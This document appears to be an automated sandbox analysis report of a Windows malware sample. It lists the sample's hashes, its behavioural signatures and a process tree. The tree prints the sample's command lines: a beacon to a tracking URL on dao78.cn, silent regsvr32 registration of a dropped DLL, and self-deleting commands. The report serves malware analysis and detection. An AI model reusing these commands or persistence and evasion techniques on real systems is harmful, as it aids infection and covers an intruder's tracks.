Analysis

  • max time kernel
    139s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    21-09-2024 00:55

General

  • Target

    eec456015479026f2a24f3dd8806eca0_JaffaCakes118.exe

  • Size

    94KB

  • MD5

    eec456015479026f2a24f3dd8806eca0

  • SHA1

    336a227d820fb2c6c8e8644e01b170e48f07d82f

  • SHA256

    d90dd97fbeca4377a9783c3ecc84889982fdbdd920ed4c1d04d879c68ac834c7

  • SHA512

    bc0e67e67c1695dc92ed9540560f92becd565caefe45880e0e8635e8df4cca99244256b30c1982df98b5c4911991c868303ff5e3838881a51615f8564e642097

  • SSDEEP

    1536:LOM0m2EQFVRfF1nfbghAN4v/8om9lPMSk/+FOyj0XJJ2aErQNHjFZ:LO/Eo7t1nfboAGDslPMSkuO9AxrQNHjr

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Installs/modifies Browser Helper Object 2 TTPs 2 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies registry class 50 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eec456015479026f2a24f3dd8806eca0_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\eec456015479026f2a24f3dd8806eca0_JaffaCakes118.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Loads dropped DLL
    • Installs/modifies Browser Helper Object
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2572
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao78.cn/tongji/count/count.asp?id=62-CA-C3-60-41-A9&ver=1.0
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2972 CREDAT:275457 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2964
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c regsvr32 /s c:\windows\system32\ieupdate.dll
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32 /s c:\windows\system32\ieupdate.dll
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        PID:2892
    • C:\Windows\SysWOW64\autoups.exe
      autoups.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2740
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c color 0a
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2888
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del C:\Windows\SysWOW64\autoups.exe > nul
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1724
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\a.bat""
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      PID:2800

Network

MITRE ATT&CK Enterprise v15

Downloads
